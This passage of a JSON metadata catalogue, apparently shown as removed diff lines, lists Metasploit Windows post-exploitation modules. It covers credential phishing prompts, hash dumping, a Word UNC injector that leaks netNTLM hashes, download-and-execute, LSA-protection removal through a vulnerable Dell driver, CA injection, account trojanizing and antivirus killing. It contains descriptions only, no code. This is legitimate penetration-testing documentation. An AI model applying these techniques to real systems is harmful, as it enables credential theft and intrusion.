Tested on Windows 8.1\n x64 with Office 2013.", - "references": [], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/outlook.rb", - "is_install_path": true, - "ref_name": "windows/gather/outlook", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "LIST", - "description": "Lists all folders" - }, - { - "name": "SEARCH", - "description": "Searches for an email" - } - ] - }, - "post_windows/gather/phish_windows_credentials": { - "name": "Windows Gather User Credentials (phishing)", - "fullname": "post/windows/gather/phish_windows_credentials", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Wesley Neelen ", - "Matt Nelson" - ], - "description": "This module is able to perform a phishing attack on the target by popping up a loginprompt.\n When the user fills credentials in the loginprompt, the credentials will be sent to the attacker.\n The module is able to monitor for new processes and popup a loginprompt when a specific process is starting. 
Tested on Windows 7.", - "references": [], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/phish_windows_credentials.rb", - "is_install_path": true, - "ref_name": "windows/gather/phish_windows_credentials", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/psreadline_history": { - "name": "Windows Gather PSReadline History", - "fullname": "post/windows/gather/psreadline_history", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Garvit Dewan " - ], - "description": "Gathers Power Shell history data from the target machine.", - "references": [ - "URL-https://docs.microsoft.com/en-us/powershell/module/psreadline/", - "URL-https://github.com/KalibRx/PoshHarvestPy/blob/master/poshharvest.py", - "URL-https://0xdf.gitlab.io/2018/11/08/powershell-history-file.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/psreadline_history.rb", - "is_install_path": true, - "ref_name": "windows/gather/psreadline_history", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/resolve_sid": { - "name": "Windows Gather Local User Account SID Lookup", - "fullname": "post/windows/gather/resolve_sid", - "aliases": [], - "rank": 300, - 
"disclosure_date": null, - "type": "post", - "author": [ - "chao-mu" - ], - "description": "This module prints information about a given SID from the perspective\n of this session.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/resolve_sid.rb", - "is_install_path": true, - "ref_name": "windows/gather/resolve_sid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/screen_spy": { - "name": "Windows Gather Screen Spy", - "fullname": "post/windows/gather/screen_spy", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Roni Bachar ", - "bannedit ", - "kernelsmith ", - "Adrian Kubok", - "DLL_Cool_J" - ], - "description": "This module will incrementally take desktop screenshots from the host. 
This\n allows for screen spying which can be useful to determine if there is an active\n user on a machine, or to record the screen for later data extraction.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/screen_spy.rb", - "is_install_path": true, - "ref_name": "windows/gather/screen_spy", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/smart_hashdump": { - "name": "Windows Gather Local and Domain Controller Account Password Hashes", - "fullname": "post/windows/gather/smart_hashdump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This will dump local accounts from the SAM Database. 
If the target\n host is a Domain Controller, it will dump the Domain Account Database using the proper\n technique depending on privilege level, OS and role of the host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/smart_hashdump.rb", - "is_install_path": true, - "ref_name": "windows/gather/smart_hashdump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/tcpnetstat": { - "name": "Windows Gather TCP Netstat", - "fullname": "post/windows/gather/tcpnetstat", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "mubix " - ], - "description": "This module lists current TCP sessions.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/tcpnetstat.rb", - "is_install_path": true, - "ref_name": "windows/gather/tcpnetstat", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/usb_history": { - "name": "Windows Gather USB Drive History", - "fullname": "post/windows/gather/usb_history", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "nebulus" - ], - "description": "This module will enumerate USB Drive history on a target host.", - "references": [], - "platform": "Windows", 
- "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/usb_history.rb", - "is_install_path": true, - "ref_name": "windows/gather/usb_history", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/win_privs": { - "name": "Windows Gather Privileges Enumeration", - "fullname": "post/windows/gather/win_privs", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Merlyn Cousins " - ], - "description": "This module will print if UAC is enabled, and if the current account is\n ADMIN enabled. It will also print UID, foreground SESSION ID, is SYSTEM status\n and current process PRIVILEGES.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/win_privs.rb", - "is_install_path": true, - "ref_name": "windows/gather/win_privs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/wmic_command": { - "name": "Windows Gather Run WMIC Commands", - "fullname": "post/windows/gather/wmic_command", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module executes WMIC commands on the specified host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": 
null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-09-23 00:25:13 +0000", - "path": "/modules/post/windows/gather/wmic_command.rb", - "is_install_path": true, - "ref_name": "windows/gather/wmic_command", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/word_unc_injector": { - "name": "Windows Gather Microsoft Office Word UNC Path Injector", - "fullname": "post/windows/gather/word_unc_injector", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "SphaZ " - ], - "description": "This module modifies a remote .docx file that will, upon opening, submit\n stored netNTLM credentials to a remote host. Verified to work with Microsoft\n Word 2003, 2007, 2010, and 2013. In order to get the hashes the\n auxiliary/server/capture/smb module can be used.", - "references": [ - "URL-https://web.archive.org/web/20140527232608/http://jedicorp.com/?p=534" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/word_unc_injector.rb", - "is_install_path": true, - "ref_name": "windows/gather/word_unc_injector", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/add_user": { - "name": "Windows Manage Add User to the Domain and/or to a Domain Group", - "fullname": "post/windows/manage/add_user", - "aliases": [ - "post/windows/manage/add_user_domain" - ], - "rank": 300, - "disclosure_date": null, - "type": "post", 
- "author": [ - "Joshua Abraham " - ], - "description": "This module adds a user to the Domain and/or to a Domain group. It will\n check if sufficient privileges are present for certain actions and run\n getprivs for system. If you elevated privs to system, the\n SeAssignPrimaryTokenPrivilege will not be assigned. You need to migrate to\n a process that is running as system. If you don't have privs, this script\n exits.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/add_user.rb", - "is_install_path": true, - "ref_name": "windows/manage/add_user", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/archmigrate": { - "name": "Architecture Migrate", - "fullname": "post/windows/manage/archmigrate", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Koen Riepe (koen.riepe " - ], - "description": "This module checks if the meterpreter architecture is the same as the OS architecture and if it's incompatible it spawns a\n new process with the correct architecture and migrates into that process.", - "references": [], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/archmigrate.rb", - "is_install_path": true, - "ref_name": "windows/manage/archmigrate", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [], - 
"Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/change_password": { - "name": "Windows Manage Change Password", - "fullname": "post/windows/manage/change_password", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Campbell " - ], - "description": "This module will attempt to change the password of the targeted account.\n The typical usage is to change a newly created account's password on a\n remote host to avoid the error, 'System error 1907 has occurred,' which\n is caused when the account policy enforces a password change before the\n next login.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/change_password.rb", - "is_install_path": true, - "ref_name": "windows/manage/change_password", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/clone_proxy_settings": { - "name": "Windows Manage Proxy Setting Cloner", - "fullname": "post/windows/manage/clone_proxy_settings", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "mubix " - ], - "description": "This module copies the proxy settings from the current user to the\n targeted user SID, supports remote hosts as well if remote registry\n is allowed.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/windows/manage/clone_proxy_settings.rb", - 
"is_install_path": true, - "ref_name": "windows/manage/clone_proxy_settings", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/delete_user": { - "name": "Windows Manage Local User Account Deletion", - "fullname": "post/windows/manage/delete_user", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "chao-mu" - ], - "description": "This module deletes a local user account from the specified server,\n or the local machine if no server is given.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/delete_user.rb", - "is_install_path": true, - "ref_name": "windows/manage/delete_user", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "service-resource-loss" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/dell_memory_protect": { - "name": "Dell DBUtilDrv2.sys Memory Protection Modifier", - "fullname": "post/windows/manage/dell_memory_protect", - "aliases": [], - "rank": 0, - "disclosure_date": null, - "type": "post", - "author": [ - "SentinelLabs", - "Kasif Dekel", - "Red Cursor", - "Jacob Baines" - ], - "description": "The Dell DBUtilDrv2.sys drivers version 2.5 and 2.7 have a write-what-where condition\n that allows an attacker to read and write arbitrary kernel-mode memory. This module\n installs the provided driver, enables or disables LSA protection on the provided\n PID, and then removes the driver. 
This would allow, for example, dumping LSASS memory\n even when secureboot is enabled or preventing antivirus from accessing the memory of\n a chosen PID.\n\n The affected drivers are not distributed with Metasploit. You will truly need to\n Bring Your Own (Dell) Driver.", - "references": [ - "URL-https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", - "URL-https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection", - "URL-https://itm4n.github.io/lsass-runasppl/", - "URL-https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/", - "URL-https://attackerkb.com/assessments/12d7b263-3684-4442-812e-dc30b93def93", - "URL-https://github.com/RedCursorSecurityConsulting/PPLKiller", - "URL-https://github.com/jbaines-r7/dellicious" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/post/windows/manage/dell_memory_protect.rb", - "is_install_path": true, - "ref_name": "windows/manage/dell_memory_protect", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [], - "Stability": [ - "crash-os-restarts" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/download_exec": { - "name": "Windows Manage Download and/or Execute", - "fullname": "post/windows/manage/download_exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "RageLtMan " - ], - "description": "This module will download a file by importing urlmon via railgun.\n The user may also choose to execute the file with arguments via exec_string.", - "references": [], - 
"platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/download_exec.rb", - "is_install_path": true, - "ref_name": "windows/manage/download_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/driver_loader": { - "name": "Windows Manage Driver Loader", - "fullname": "post/windows/manage/driver_loader", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Borja Merino " - ], - "description": "This module loads a KMD (Kernel Mode Driver) using the Windows Service API.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/driver_loader.rb", - "is_install_path": true, - "ref_name": "windows/manage/driver_loader", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-down" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/enable_rdp": { - "name": "Windows Manage Enable Remote Desktop", - "fullname": "post/windows/manage/enable_rdp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module enables the Remote Desktop Service (RDP). 
It provides the options to create\n an account and configure it to be a member of the Local Administrators and\n Remote Desktop Users group. It can also forward the target's port 3389/tcp.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/enable_rdp.rb", - "is_install_path": true, - "ref_name": "windows/manage/enable_rdp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/enable_support_account": { - "name": "Windows Manage Trojanize Support Account", - "fullname": "post/windows/manage/enable_support_account", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "salcho " - ], - "description": "This module enables alternative access to servers and workstations\n by modifying the support account's properties. It will enable\n the account for remote access as the administrator user while\n taking advantage of some weird behavior in lusrmgr.msc. 
It will\n check if sufficient privileges are available for registry operations,\n otherwise it exits.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/enable_support_account.rb", - "is_install_path": true, - "ref_name": "windows/manage/enable_support_account", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/exec_powershell": { - "name": "Windows PowerShell Execution Post Module", - "fullname": "post/windows/manage/exec_powershell", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Nicholas Nam (nick ", - "RageLtMan " - ], - "description": "This module will execute a PowerShell script in a meterpreter session.\n The user may also enter text substitutions to be made in memory before execution.\n Setting VERBOSE to true will output both the script prior to execution and the results.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/exec_powershell.rb", - "is_install_path": true, - "ref_name": "windows/manage/exec_powershell", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/execute_dotnet_assembly": { - "name": "Execute .net Assembly (x64 only)", - "fullname": 
"post/windows/manage/execute_dotnet_assembly", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "b4rtik" - ], - "description": "This module executes a .NET assembly in memory. It\n reflectively loads a dll that will host CLR, then it copies\n the assembly to be executed into memory. Credits for AMSI\n bypass to Rastamouse (@_RastaMouse)", - "references": [ - "URL-https://b4rtik.github.io/posts/execute-assembly-via-meterpreter-session/" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/execute_dotnet_assembly.rb", - "is_install_path": true, - "ref_name": "windows/manage/execute_dotnet_assembly", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/forward_pageant": { - "name": "Forward SSH Agent Requests To Remote Pageant", - "fullname": "post/windows/manage/forward_pageant", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Stuart Morgan ", - "Ben Campbell " - ], - "description": "This module forwards SSH agent requests from a local socket to a remote Pageant instance.\n If a target Windows machine is compromised and is running Pageant, this will allow the\n attacker to run normal OpenSSH commands (e.g. ssh-add -l) against the Pageant host which are\n tunneled through the meterpreter session. 
This could therefore be used to authenticate\n with a remote host using a private key which is loaded into a remote user's Pageant instance,\n without ever having knowledge of the private key itself.\n\n Note that this requires the PageantJacker meterpreter extension, but this will be automatically\n loaded into the remote meterpreter session by this module if it is not already loaded.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-09-23 17:41:20 +0000", - "path": "/modules/post/windows/manage/forward_pageant.rb", - "is_install_path": true, - "ref_name": "windows/manage/forward_pageant", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/hashcarve": { - "name": "Windows Local User Account Hash Carver", - "fullname": "post/windows/manage/hashcarve", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "p3nt4" - ], - "description": "This module will change a local user's password directly in the registry.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/hashcarve.rb", - "is_install_path": true, - "ref_name": "windows/manage/hashcarve", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/ie_proxypac": { - "name": "Windows Manage Proxy PAC File", - 
"fullname": "post/windows/manage/ie_proxypac", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Borja Merino " - ], - "description": "This module configures Internet Explorer to use a PAC proxy file. By using the LOCAL_PAC\n option, a PAC file will be created on the victim host. It's also possible to provide a\n remote PAC file (REMOTE_PAC option) by providing the full URL.", - "references": [ - "URL-https://www.youtube.com/watch?v=YGjIlbBVDqE&hd=1", - "URL-http://blog.scriptmonkey.eu/bypassing-group-policy-using-the-windows-registry" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/ie_proxypac.rb", - "is_install_path": true, - "ref_name": "windows/manage/ie_proxypac", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "service-resource-loss" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/inject_ca": { - "name": "Windows Manage Certificate Authority Injection", - "fullname": "post/windows/manage/inject_ca", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "vt " - ], - "description": "This module allows the attacker to insert an arbitrary CA certificate\n into the victim's Trusted Root store.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/inject_ca.rb", - "is_install_path": true, - "ref_name": "windows/manage/inject_ca", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" 
- ], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/inject_host": { - "name": "Windows Manage Hosts File Injection", - "fullname": "post/windows/manage/inject_host", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "vt " - ], - "description": "This module allows the attacker to insert a new entry into the target\n system's hosts file.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/inject_host.rb", - "is_install_path": true, - "ref_name": "windows/manage/inject_host", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/install_python": { - "name": "Install Python for Windows", - "fullname": "post/windows/manage/install_python", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Michael Long " - ], - "description": "This module places an embeddable Python3 distribution onto the target file system,\n granting pentesters access to a lightweight Python interpreter.\n This module does not require administrative privileges or user interaction with\n installation prompts.", - "references": [ - "URL-https://docs.python.org/3/using/windows.html#windows-embeddable", - "URL-https://attack.mitre.org/techniques/T1064/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": 
"/modules/post/windows/manage/install_python.rb", - "is_install_path": true, - "ref_name": "windows/manage/install_python", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/install_ssh": { - "name": "Install OpenSSH for Windows", - "fullname": "post/windows/manage/install_ssh", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Michael Long " - ], - "description": "This module installs OpenSSH server and client for Windows using PowerShell.\n SSH on Windows can provide pentesters persistent access to a secure interactive terminal, interactive filesystem access, and port forwarding over SSH.", - "references": [ - "URL-https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_overview", - "URL-https://github.com/PowerShell/openssh-portable" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/install_ssh.rb", - "is_install_path": true, - "ref_name": "windows/manage/install_ssh", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/kerberos_tickets": { - "name": "Kerberos Ticket Management", - "fullname": "post/windows/manage/kerberos_tickets", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Will Schroeder", - "Spencer McIntyre" - ], - 
"description": "Manage kerberos tickets on a compromised host.", - "references": [ - "URL-https://github.com/GhostPack/Rubeus", - "URL-https://github.com/wavvs/nanorobeus" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/windows/manage/kerberos_tickets.rb", - "is_install_path": true, - "ref_name": "windows/manage/kerberos_tickets", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "DUMP_TICKETS", - "description": "Dump the Kerberos tickets" - }, - { - "name": "ENUM_LUIDS", - "description": "Enumerate session logon LUIDs" - }, - { - "name": "SHOW_LUID", - "description": "Show the current LUID" - } - ] - }, - "post_windows/manage/killav": { - "name": "Windows Post Kill Antivirus and Hips", - "fullname": "post/windows/manage/killav", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Marc-Andre Meloche (MadmanTM)", - "Nikhil Mittal (Samratashok)", - "Jerome Athias", - "OJ Reeves" - ], - "description": "This module attempts to locate and terminate any processes that are identified\n as being 